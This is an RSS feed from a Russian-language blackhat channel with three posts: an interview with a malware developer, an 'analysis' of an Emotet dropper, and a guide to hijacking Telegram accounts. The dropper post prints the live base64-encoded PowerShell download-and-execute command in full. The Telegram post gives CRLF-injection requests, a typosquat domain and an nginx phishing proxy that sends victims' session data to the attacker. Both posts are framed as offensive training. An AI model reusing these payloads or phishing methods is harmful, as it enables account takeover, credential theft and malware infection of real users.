<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@DARKSiDEiNViTE | Dark $ide - Твоя Тёмная сторона.</title><generator>teletype.in</generator><description><![CDATA[Legends of Zelda]]></description><image><url>https://teletype.in/files/e6/a3/e6a3f91d-f5e2-4267-a94e-0fc0bd9f122c.jpeg</url><title>@DARKSiDEiNViTE | Dark $ide - Твоя Тёмная сторона.</title><link>https://teletype.in/@exploit_dar</link></image><link>https://teletype.in/@exploit_dar?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/exploit_dar?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/exploit_dar?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 19 Apr 2026 11:44:43 GMT</pubDate><lastBuildDate>Sun, 19 Apr 2026 11:44:43 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/62pWCnQwH</guid><link>https://teletype.in/@exploit_dar/62pWCnQwH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/62pWCnQwH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Мини-интервью с Malware-разработчиком X-Shar.</title><pubDate>Mon, 18 May 2020 15:08:34 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b2/f8/b2f8ede1-0dda-463c-a318-12bfe6accfc1.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/0f/4d/0f4dcde1-839c-4464-afdd-30f4dd7b8e7b.jpeg"></img>Привет, скрипт-кидди братья, в этой статье решил опробовать себя в качестве эдакого журналиста, и задал пару вопросов администратору(создателю) форума ru-sfera.org, а так-же по совместительству программисту, занимающимся низкоуровневой разработкой, человеком известным под ником X-Shar. ]]></description><content:encoded><![CDATA[
  <p>Привет, скрипт-кидди братья, в этой статье решил опробовать себя в качестве эдакого журналиста, и задал пару вопросов администратору(создателю) форума ru-sfera.org, а так-же по совместительству программисту, занимающимся низкоуровневой разработкой, человеком известным под ником <strong>X-Shar. </strong></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/0f/4d/0f4dcde1-839c-4464-afdd-30f4dd7b8e7b.jpeg" width="1920" />
  </figure>
  <p><strong>Интервью.</strong></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/6b/a3/6ba391d6-9bc5-4c8f-bcd5-8941e4e110a2.jpeg" width="640" />
  </figure>
  <h3>Как познакомился с малварью? Какой был первый вирус?</h3>
  <p>- О, это целая история. Малварью начал увлекаться еще в школе, не помню лет наверное 14 мне было, на тот момент были популярны билдеры малварей, такие как &quot;Апокалипсес&quot;, &quot;Смерть ламера&quot;, эти билдеры до сех-пор можно скачать на моем сайте, хоть они неактуальны уже.<br />Так-вот, в то время только появился интернет, на диалапе и как-раз я подцепил вирус &quot;Смерть ламера&quot;, мне стало интересно, что это такое, начал гуглить и понял, что такие штуки можно создавать самому.)<br />Далее я начал так шутить над школьными компами, было короче весело... Потом когда я стал более старше, интерес к малвари не прошел, мне стали интересны антивирусы, в плане настроек. Я начал экспериментировать с настройками, как антивирус ведет себя при смене настроек т.д.<br />Потом я стал искать единомышленников и на удивление нашел форумы, где люди общались на такие темы. В последствии это привело к созданию форума &quot;Ру-Сфера&quot;, поэтому перейду к ответу на следующий вопрос. </p>
  <p></p>
  <h3>Твой первый язык программирования, и почему именно он?</h3>
  <p>- Мой первый язык программирования был турбо-паскаль, если такой еще кто помнит.). Потому-что в школе, а после и в инсте его преподавали, программы писали мы в основном математические, расчет интеграла и т.д., короче голая математика. </p>
  <p></p>
  <h3>Есть ли у твоего никнейма какая-то история?</h3>
  <p>- Истории какой-то нет, просто мой сайт называется &quot;Ру-Сфера&quot;, от сюда и родился &quot;X-Shar&quot;.))) Почему &quot;Ру-Сфера&quot;, я сейчас уже и не вспомню.)</p>
  <p></p>
  <h3>Почему решил сделать свой форум? История о создании ru-sfera.org</h3>
  <p>- Как написано выше мне было интересно изучать антивирусы в плане настроек и как они реагируют на малварь, также как оказалось в сети на тот момент было много форумов, на которых люди общались, были даже форумы фанов конкретных антивирусов.<br />Обитатели данных форумов, часто даже не были айтишниками, народ-был разных профессий, основной темой для общения были: это настройки антивирусов, тесты антивирусов, ключи для антивирусов. Да в то-время было интересно получать самому ключи для антивирусов, это был своеобразный квест, нужно-было зарегистрироваться где-то через прокси, либо просто установить антивирус себе на виртуальную машину. Ключи присылались на почту и форумчане делились ими. В итоге было весело и интересно, меня затянуло все это. Потом я подумал, а почему-бы не создать свой форум такого направления?<br />В то время, все форумы подобной тематике были на форумном движке vBulletin 3, но был еще мало популярен, но перспективен форумный движок XenForo, я как его поставил и сразу &quot;влюбился в него&quot;, тут меня затянуло уже больше даже сайтостроительство, я начал развиваться в этой сфере, в последствии проявлял активность на форумах посвященных XenForo и делал &quot;эксперименты&quot; на своем форуме, было тоже достаточно интересно...</p>
  <p>В целом интерес к малваре и тогда не пропал, по началу разделов/контента на форуме было немного, по моему три всего раздела было:</p>
  <ol>
    <li>Промо-акции для антивирусов - <em>Тут обсуждались всякие там промо-акции для получения ключей;</em></li>
    <li>Безопасность системы - <em>Тут обсуждались настройки АВ, различные проблемы и т.д.</em></li>
    <li> Хакерский раздел - Тут не было на первых парах ничего кроме копипаста, да и программы в основном старался выкладывать деструктивные, типо-там &quot;Апокалипсис&quot;, &quot;Смерть ламера&quot; и т.д.</li>
  </ol>
  <p>Потом время шло, форум стал интересен обычным людям, не айтишникам, кто-то заходил, что-бы получить ключ для антивируса, кому-то было интересно обсудить настройки, тесты,  или просто треп, типо &quot;Какой антивирус лучше&quot;, была также и команда...)</p>
  <p>В целом развивался и &quot;Хакерский раздел&quot;, но в основном это были &quot;Любительские статьи&quot;, типо там &quot;Как спрятать вирус&quot;, &quot;Как написать криптор&quot;.<br />Также выкладывался софт, типо ратников, троянов и программ-генераторов вирусов типо &quot;Апокалипсес&quot;.<br />Вообще все выкладывалось, не для того что-бы кто-то кому-то навредил, всем было интересно это обсуждать.</p>
  <p>Но со временем, интерес у людей пропал, в принципе с появлением соц. сетей, а в последствии и мессенджеров форумы сейчас не многолюдны как раньше...:(<br />  <br />Также-как, те кто был в команде повзрослели, обзавелись семьей, интересы поменялись.<br />Да и если говорить про меня, то у меня тоже изменились интересы, теперь меня стали интересовать более сложные вещи, мне стало интересны технологии, <br />как устроена малварь внутри и как это можно сделать самому.)</p>
  <p>В целом мне и сейчас все это интересно, но т.к. исторически сложилось, что сфера моей деятельности, это низкоуровневая разработка, для каких-то железок.<br />То собственно и интерес сейчас именно к низкоуровневой малвари, а именно это руткиты, может-быть крипторы и т.д.<br />  <br />Вообще я сейчас изучаю разные операционные системы, в том-числе и операционные системы реального времени, очень интересно что-то там поделать, на уровне ядра.<br />Ну собственно и контент от меня будет в основном в этой сфере, если малварь, это изучение руткитов, если разработка, то это в основном &quot;системное программирование&quot; и разработка на уровне ядра.</p>
  <p></p>
  <h3>Малварь на .NET, можно ли в 2020?</h3>
  <p>- Как я уже писал, моя сфера деятельности - Это низкоуровневая разработка, С# я использую очень редко, только для создания гуя.<br />Тем не менее, а почему и не создавать малварь на C#?<br />Что этому мешает, на C# кодить относительно проще, чем на С++, поэтому стиллеры, лоадеры, боты. Вполне себе-можно писать на С#.</p>
  <p>Другое дело драйвер для винды, вы на C# не напишете, там на уровне ядра нетак давно С++ то появился.)))</p>
  <p>Собственно поэтому и если речь идет о руткитах, тут уже старичек Си.)))</p>
  <p></p>
  <h3>WhiteHat или BlackHat, и почему?</h3>
  <p>- Я себя отношу к WhiteHat, потому-что малварь для меня всегда была как стимул познавать что-то новое, в принципе и сейчас так, основная моя деятельность не связана с малварью, но интерес к малвари стимулирует познавать что-то новое, что в итоге помогает и по работе.)))</p>
  <p></p>
  <h3>Писал ли ты коммерческую малварь?</h3>
  <p>- Нет не писал. На паблик писал кейлогеры, крипторы. Но на продажу нет. Бывает, что меня просят помочь с коденгом, кто пишит малварь в комерс, если человек адекватный и если есть время и возможность помочь, то неотказываю. Кто-то даже за это платит.)<br />Также с BlackHat бывает интересно пообщаться, узнаешь что-то новое для себя, у меня такого нет, типо я WhiteHat а блеки это позор и отстой. Нет, просто каждый сам выбирает свой путь, не мне кого-то осуждать, тем не менее я-бы не хотел заниматься чернухой, это не мое точно.)))</p>
  <p></p>
  <h3>Где можно следить за твоей деятельностью?</h3>
  <p>- На моем сайте <a href="https://ru-sfera.org/" target="_blank">https://ru-sfera.org/</a><br />По сути форум сейчас почти как личный блог, решил развивать в основном темы &quot;Системное программирование&quot; и низкоуровневая разработка уровня ядра.</p>
  <p>Также будут темы по изучению руткитов.</p>
  <p>Также у меня есть аккаунт на гитхабе: <a href="https://github.com/xshar" target="_blank">https://github.com/xshar</a><br />На форуме есть контакты, но основная почта, где со мной можно выйти на связь, это: zoa88@pm.me</p>
  <p></p>
  <p>На этом вопросы подошли к концу, отдельное спасибо X-Shar за потраченное время на ответы на вопросы. </p>
  <h3><a href="https://t.me/joinchat/AAAAAFNPU7H8BeULqhzNVA" target="_blank">Dark $ide</a> - with love ^_^</h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/rJpjmYnl8</guid><link>https://teletype.in/@exploit_dar/rJpjmYnl8?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/rJpjmYnl8?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Анализ малвари от китайских APT.</title><pubDate>Wed, 15 Jan 2020 12:20:52 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/b3/e9/b3e96e0a-bda1-4f64-b9da-0e3bcaf3f601.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/b3/e9/b3e96e0a-bda1-4f64-b9da-0e3bcaf3f601.png"></img>Сегодня я в качестве черной шляпы, подучусь опыта на белошляпных ресурсах для того что бы добавить в нашу малварь немного перца. Давайте начнем изучать нормальные боти от нормальных китайских APT.]]></description><content:encoded><![CDATA[
  <p>Сегодня я в качестве черной шляпы, подучусь опыта на белошляпных ресурсах для того что бы добавить в нашу малварь немного перца. Давайте начнем изучать нормальные боти от нормальных китайских APT.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/b3/e9/b3e96e0a-bda1-4f64-b9da-0e3bcaf3f601.png" width="1280" />
    <figcaption>Как в старом ][akepe</figcaption>
  </figure>
  <p>Если уж говорить о шляпных ресурсах то в наших славных руках есть очень гендерно нейтральный &quot;<a href="https://app.any.run/" target="_blank">app.any.run</a>&quot; на котором юные школьники ковыряют билды ваших любимых азорультиков, предаторов и остальной такой же хуйни из паблика, но иногда взрослые дядечки приносят туда очень интересные экземпляры, например билды тех же АПТ группировок. Давайте глянем какого мертвеца нам принесло морем из Поднебесной. Попробуем разобраться как он работает и что из себя представляет...</p>
  <p><a href="https://app.any.run/tasks/c70e4a03-ff38-4135-b851-fda307307f06/" target="_blank">Ботя из Китая</a></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/80/6e/806e8557-d249-44d4-a12f-a306db883b2f.png" width="1178" />
    <figcaption>Итак, мы видим что человек который залил ботю на эниран скочал его через браузер, и запустил ексель файл с макросом</figcaption>
  </figure>
  <p>Первичная нагрузка была доставлена на ПК с помощью макроса зашитого в DOC файл, это нормально для всех APT групп, не нужно кривляться и думать, что банковский работник обычно запускает что то другое. На самом деле это вполне нормальный контент для человека который открывает DOC файлы 12 часов в сутки, и одна из основных программ на рабочем столе этого человека это как раз клиент корпоративной почты. Ну вы поняли, ага?</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/d4/e3/d4e3d297-97a3-4c3b-afbf-dddac459f9b5.png" width="1177" />
  </figure>
  <p>Основная нагрузка этого документа - это скрипт в макросах и страница заглушка - говорящая нам что он открывается в другой версии MS Word. </p>
  <p><em>Стандартная, слишком палевная, хуйня</em>, - скажете вы. Я буду согласен, но при массовой рассылке: <em>вам не похуй ли бы было</em>? Хоть один да бы открыл. Ладно поехали дальше.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/84/89/84895f79-4a9b-4ed2-92ba-65bd34de706d.png" width="1009" />
    <figcaption>Немыслеммый ужас повергающий СБ банков в трепетный шок, а именно работа Google Chrome</figcaption>
  </figure>
  <p>Тут в основном все строчки рассказывают нам о работе гугл хрома, потому что малварьхантер именно работал в хроме, потом запустил ворд, потом уже заработал макрос, нам придется просто чуть чуть потянуть ползунок полосы прокрутки вниз и увидеть как пауршелл запускает полезную нагрузку которую прячет в кодировке base64</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/08/91/08914405-15a5-4673-82a1-825b29b3837b.png" width="420" />
  </figure>
  <pre>powershell -w hidden -en JABDAGUAaABkAHAAcQB5AHMAPQAnAEQAeABlAG4AdQByAHEAdQBjAHcAYQBuACcAOwAkAFcAZgB4AHYAaABzAGoAdgAgAD0AIAAnADQANwAwACcAOwAkAEoAYwBsAGcAcgBqAHUAZABwAGcAZwA9ACcATwBkAGMAaABtAGsAeQB5AGIAawAnADsAJABRAGkAawByAG4AZAB1AGIAegBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABXAGYAeAB2AGgAcwBqAHYAKwAnAC4AZQB4AGUAJwA7ACQAQwBvAHMAbQBhAG8AcwBzAG0AZgBvAD0AJwBOAGoAagB1AG8AZwBvAGgAZgBnACcAOwAkAEEAaQB1AHkAcQBlAHEAZgBoAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBCAEMAbABpAEUATgBUADsAJABUAGoAdQB3AGYAagBlAHkAdwB5AD0AJwBoAHQAdABwADoALwAvAGIAawBqADIAMAAwADIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAFkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AG8AcABhAGcAZQBuAGMAeQAuAG4AYQB0AGgAYQBuAG8AbgBsAGkAbgBlAC4AdQBzAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQAxAHAALwAqAGgAdAB0AHAAcwA6AC8ALwBkAHUAawBlAGEAdABhAC4AYwBvAG0ALwBsAG8AZwBpAG4AXwBmAG8AcgBtAC8AagBBAGwAZQAvACoAaAB0AHQAcABzADoALwAvAGgAbwB3AGUAbABsAHQAYQB4AGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGoAWAAvACoAaAB0AHQAcABzADoALwAvAGwAYQB1AHMAaQBuAGUAeABhAG0AZQBuAGUAcwAuAGMAbwBtAC8AZABpAHMAYwBsAG8AcwB1AHIAZQBzAC8ANgBiAHAALwAnAC4AIgBzAFAAbABgAEkAdAAiACgAJwAqACcAKQA7ACQAUwBhAGIAcQBzAGgAcgBrAHIAcAB1AGIAPQAnAFMAbgByAHgAaQBwAG8AdgB6AGEAcAAnADsAZgBvAHIAZQBhAGMAaAAoACQAUABxAG4AcAB6AGcAbwBrAHMAIABpAG4AIAAkAFQAagB1AHcAZgBqAGUAeQB3AHkAKQB7AHQAcgB5AHsAJABBAGkAdQB5AHEAZQBxAGYAaAAuACIARABPAFcAYABOAGwATwBhAEQAZgBJAGAATABFACIAKAAkAFAAcQBuAHAAegBnAG8AawBzACwAIAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARQBsAGkAdwBoAHUAcgBoAG4AcQA9ACcAWQB4AGMAdQB5AHAAaABjAHoAbwBhAHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAGkAawByAG4AZAB1AGIAegBzACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgA2ADEAMQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARgB4AGIAYQBiAG4AdQBtAHkAaQA9ACcASAB6AGcAZQB3AG8AZABqAHMAbABhACcAOwBiAHIAZQBhAGsAOwAkAEgAYgBuAHEAbABzAG8AagBsAG0APQAnAFEAYQBoAGQAawBkAG0AZQBjAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBkAGIAZQBvAHEAdAB4AGEAcAB1AGwAPQAnAE4AcQBmAGQAdgBuAHgAcwBnAG8AdwBnAGkAJwA=</pre>
  <p>Итак разберем аргументы командной строки которые тут выполняются:</p>
  <p>Вызывается интерпретатор powershell.exe; окно которого скрыто значением ключа -w с параметром hidden; и сам скрипт пауршелла у нас обусфицирован и енкодирован в строку в кодировке base64, и расшифровывается и запускается как обычная комманда с ключом -en.</p>
  <p>Давайте расшифруем, деобусфицируем и посмотрим что там внутри:</p>
  <pre>$command = &quot;JABDAGUAaABkAHAAcQB5AHMAPQAnAEQAeABlAG4AdQByAHEAdQBjAHcAYQBuACcAOwAkAFcAZgB4AHYAaABzAGoAdgAgAD0AIAAnADQANwAwACcAOwAkAEoAYwBsAGcAcgBqAHUAZABwAGcAZwA9ACcATwBkAGMAaABtAGsAeQB5AGIAawAnADsAJABRAGkAawByAG4AZAB1AGIAegBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABXAGYAeAB2AGgAcwBqAHYAKwAnAC4AZQB4AGUAJwA7ACQAQwBvAHMAbQBhAG8AcwBzAG0AZgBvAD0AJwBOAGoAagB1AG8AZwBvAGgAZgBnACcAOwAkAEEAaQB1AHkAcQBlAHEAZgBoAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBCAEMAbABpAEUATgBUADsAJABUAGoAdQB3AGYAagBlAHkAdwB5AD0AJwBoAHQAdABwADoALwAvAGIAawBqADIAMAAwADIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAFkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AG8AcABhAGcAZQBuAGMAeQAuAG4AYQB0AGgAYQBuAG8AbgBsAGkAbgBlAC4AdQBzAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQAxAHAALwAqAGgAdAB0AHAAcwA6AC8ALwBkAHUAawBlAGEAdABhAC4AYwBvAG0ALwBsAG8AZwBpAG4AXwBmAG8AcgBtAC8AagBBAGwAZQAvACoAaAB0AHQAcABzADoALwAvAGgAbwB3AGUAbABsAHQAYQB4AGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGoAWAAvACoAaAB0AHQAcABzADoALwAvAGwAYQB1AHMAaQBuAGUAeABhAG0AZQBuAGUAcwAuAGMAbwBtAC8AZABpAHMAYwBsAG8AcwB1AHIAZQBzAC8ANgBiAHAALwAnAC4AIgBzAFAAbABgAEkAdAAiACgAJwAqACcAKQA7ACQAUwBhAGIAcQBzAGgAcgBrAHIAcAB1AGIAPQAnAFMAbgByAHgAaQBwAG8AdgB6AGEAcAAnADsAZgBvAHIAZQBhAGMAaAAoACQAUABxAG4AcAB6AGcAbwBrAHMAIABpAG4AIAAkAFQAagB1AHcAZgBqAGUAeQB3AHkAKQB7AHQAcgB5AHsAJABBAGkAdQB5AHEAZQBxAGYAaAAuACIARABPAFcAYABOAGwATwBhAEQAZgBJAGAATABFACIAKAAkAFAAcQBuAHAAegBnAG8AawBzACwAIAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARQBsAGkAdwBoAHUAcgBoAG4AcQA9ACcAWQB4AGMAdQB5AHAAaABjAHoAbwBhAHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAGkAawByAG4AZAB1AGIAegBzACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgA2ADEAMQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARgB4AGIAYQBiAG4AdQBtAHkAaQA9ACcASAB6AGcAZQB3AG8AZABqAHMAbABhACcAOwBiAHIAZQBhAGsAOwAkAEgAYgBuAHEAbABzAG8AagBsAG0APQAnAFEAYQBoAGQAawBkAG0AZQBjAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBkAGIAZQBvAHEAdAB4AGEAcAB1AGwAPQAnAE4AcQBmAGQAdgBuAHgAcwBnAG8AdwBnAGkAJwA=&quot;
$decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($command));
Write-Output $decodedCommand</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/a6/5b/a65bcd43-9f15-41db-9a9a-48734f0e4eec.png" width="754" />
  </figure>
  <p>Результат обусфицирован плохо, вообще говнёво если сказать честно, один раз тупо прошлись, и видимо в ручную, как обычно я это делаю, потом разберемся как можно было бы сделать лучше, но лучше сейчас восстановим оригинальный код, для того что бы проанализировать что то там...</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/f9/f7/f9f70612-d373-42b4-bd3e-0c85d5ac9a11.png" width="536" />
    <figcaption>Немного поправил разметочку</figcaption>
  </figure>
  <p>Немного приводим в порядок разметку, делая отступы где нужно и обращая внимание на то что бы код более или менее был читаем. Теперь нам тут и видно что переменные как полагается названы чисто ради обусфикации - рандомными наборами англ букв, и некоторые из них просто лишние. Немного уберем текстовые переменные, просто заменив их на текст, там куда они должны были подставится.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/51/4e/514e5ee3-b630-44fc-b2b8-c60e7b320c8f.png" width="769" />
  </figure>
  <p>Итак в начале скрипта мы имеем всего две переменных, одна из которых название файла, который дропается на диск, вторая список сайтов с которых вкачивается этот файл, далее мы интерируем данный список и скачиваем файл до первой победы когда выполнима проверка на размер скачанного, потом запускаем красного петуха.</p>
  <p><strong>В принципе </strong>про загрузчик всё.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/6e/8d/6e8d756a-baf5-4ecf-b0c4-d7dc40930f14.png" width="412" />
    <figcaption>Что же делает наш дропнувшиеся файл?</figcaption>
  </figure>
  <p>А наш дропнутый на диск файл как видим далее запустился и после этого еще вызвал процесс с ключём --9d4c526b. Что это нам говорит? А то что это Emotet.</p>
  <p>Вот статья в Юном Хакерёнке https://xakep.ru/2019/09/17/emotet-is-back/. </p>
  <p></p>
  <p>Эта статья была позаимствована у моего хорошего зн��комого: <a href="http://t.me/papz777" target="_blank">@papz777</a> </p>
  <p></p>
  <p><a href="https://t.me/joinchat/AAAAAFNPU7FoCp8mcBr4xg" target="_blank">Dark $ide</a>, with løve &lt;3</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/HksSfHXxI</guid><link>https://teletype.in/@exploit_dar/HksSfHXxI?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/HksSfHXxI?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Массовый взлом телеграм аккаунтов.</title><pubDate>Wed, 08 Jan 2020 11:51:31 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/21/54/21540cee-b1da-4738-b3c8-0f93deb93abd.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/21/54/21540cee-b1da-4738-b3c8-0f93deb93abd.png"></img>Привет, юный блэкхэт, эта статья будет посвящена взлому телеграм аккаунтов.]]></description><content:encoded><![CDATA[
  <p>Привет, юный блэкхэт, эта статья будет посвящена взлому телеграм аккаунтов.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/21/54/21540cee-b1da-4738-b3c8-0f93deb93abd.png" width="823" />
  </figure>
  <p>Помимо официального клиентов активно используется домен telegram.me. Он служит как ссылка на контакт, инвайт-ссылка для добавления в группу или канал, через него также можно добавить стикеры. Если пользователь аутентифицирован в веб-клиенте, то там присутствует кука stel_web_auth, которая отвечает, на какой домен перенаправлять пользователя.</p>
  <p>Вот примеры запроса к telegram.me с кукой:</p>
  <p> <code>GET /i_bo0om HTTP/1.1 Host: telegram.me Cookie: <strong>stel_web_auth=localhost</strong></code></p>
  <p>И ответ:</p>
  <p><code>HTTP/1.1 302 Found Server: nginx/1.6.2 Date: Thu, 19 May 2016 22:02:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive Set-Cookie: stel_ssid=823678114; path=/ Pragma: no-cache Cache-control: no-store <strong>Location: localhost#/im?tgaddr=tg%3A%2F%2Fresolve%3Fdomain%3Di_bo0om</strong> Strict-Transport-Security: max-age=15768000</code></p>
  <p>Стоит заметить, что в куке присутствует возможность вставить <a href="https://ru.wikipedia.org/wiki/%D0%9F%D0%B5%D1%80%D0%B5%D0%B2%D0%BE%D0%B4_%D1%81%D1%82%D1%80%D0%BE%D0%BA%D0%B8" target="_blank">\r\n</a> символы, что позволяет подделать заголовки ответов от сервера, или, например, <a href="http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting" target="_blank">целый HTTP-пакет</a>. А это ведет как минимум к XSS (привет Internet Explorer).</p>
  <p>Обычно, в случае CRLF для демонстрации уязвимости ставят заголовок Set-cookie, который устанавливает куку. Но у меня CRLF инъекция уже через куку, поэтому обойдусь :))</p>
  <p></p>
  <p>Вот пример подделки заголовков:</p>
  <p><code>GET /i_bo0om HTTP/1.1 Host: telegram.me Cookie: stel_web_auth=localhost<strong>%0d%0a%20</strong>Header1%3a%20ok<strong>%0d%0a%20</strong>Header2%3a%20ok<strong>%0d%0a%20</strong>other:%20</code></p>
  <p>Ответ:</p>
  <p><code>HTTP/1.1 302 Found Server: nginx/1.6.2 Date: Thu, 19 May 2016 22:23:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive Set-Cookie: stel_ssid=1297301663; path=/ Pragma: no-cache Cache-control: no-store Location: localhost <strong>Header1: ok</strong> <strong>Header2: ok</strong> other: #/im?tgaddr=tg%3A%2F%2Fresolve%3Fdomain%3Di_bo0om Strict-Transport-Security: max-age=15768000</code></p>
  <p></p>
  <p>Заметь, что присутствует заголовок <strong>Strict-Transport-Security</strong>, что не позволяет добраться до заветной печеньки, если пытаешься использовать MiTM-атаку (человек посередине), несмотря на то, что у куки нет флага Secure. Значит куку можно поставить с помощью XSS (нет флага HttpOnly), но я её так сходу не нашёл.</p>
  <p>И тут я вспомнил про одну особенность современных веб-приложений. Поддомен (blabla.telegram.me) может поставить cookie на главный домен (telegram.me). Получится, конечно, не open redirect, а хитрое перенаправление на чужой домен, при использовании домена telegram.me</p>
  <p>Для этого, мне нужно:</p>
  <ol>
    <li>Раздать свою Wi-Fi точку.</li>
    <li>Перенаправлять пользователей на несуществующий поддомен, который ставит куку.</li>
    <li>Заставить пользователя зайти на мой поддомен. С учетом первого шага — легко.</li>
  </ol>
  <p>Когда пользователю кинут ссылку на приглашение, например, в группу — его перенаправит на фейковое приложение. Пробуем? Поехали!</p>
  <p></p>
  <h3>Готовим фейк.</h3>
  <p>Воспользовавшись утилитой <a href="https://www.morningstarsecurity.com/research/urlcrazy" target="_blank">urlcrazy</a> я сгенерировал свободные домены подходящие для фейка. Отлично подошёл tele<strong>rg</strong>am.org. Телеграм достаточно сложное слово, чтобы можно было не заметить смену двух моноширных согласных посередине.</p>
  <p>Взял облачный сервер на месяц и сделал фейк. Ну как сделал фейк. Я воспользовался проксированием с помощью nginx. Используя <a href="https://nginx.org/ru/docs/http/ngx_http_proxy_module.html#proxy_pass" target="_blank">модуль proxy_pass</a> можно настроить проксирование всех запросов на другой сайт, таким образом зашедший на мой ресурс видел содержимое другого сайта, целиком и полностью, включая изменения в реальном времени.</p>
  <p>Вот полный конфиг «фейка» главного сайта telegram:</p>
  <p><code>server { listen 80; # слушаем 80 порт server_name telergam.org; #на какой домен откликаемся location / { proxy_pass <a href="https://telegram.org" target="_blank">https://telegram.org</a>; #проксируем сайт телеграма }</code></p>
  <p>А ещё используя модуль <a href="https://nginx.org/ru/docs/http/ngx_http_sub_module.html#sub_filter" target="_blank">sub_filter</a> можно заменять содержимое строки на произвольную. По образу и подобию было настроено проксирование на web.telegram, с некоторыми поправками — клиент отправлял на мой сервер текущий идентификатор сессии (и прочие данные из localStorage), номер телефона, браузер.</p>
  <p>Что еще нужно для хорошей жизни? SSL! Ну продвинутые пользователи сразу заподозрят неладное, а присутствие «зеленого замочка» прибавляет к харизме фейку.</p>
  <p>Поэтому регистрируем бесплатный аккаунт на <a href="https://www.cloudflare.com/" target="_blank">cloudflare</a> и получаем возможность закрыть от чужих глаз ip адрес сервера и заветный замочек 🙂</p>
  <p>Теперь попробуй найти 10 отличий:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/fb/63/fb637f73-2eda-4aa0-aaf0-4e9eb97ad49f.png" />
  </figure>
  <p>Но если посмотреть исходник, то там будет лишний js, который и отправляет данные жертвы на подконтрольный сервер.</p>
  <p></p>
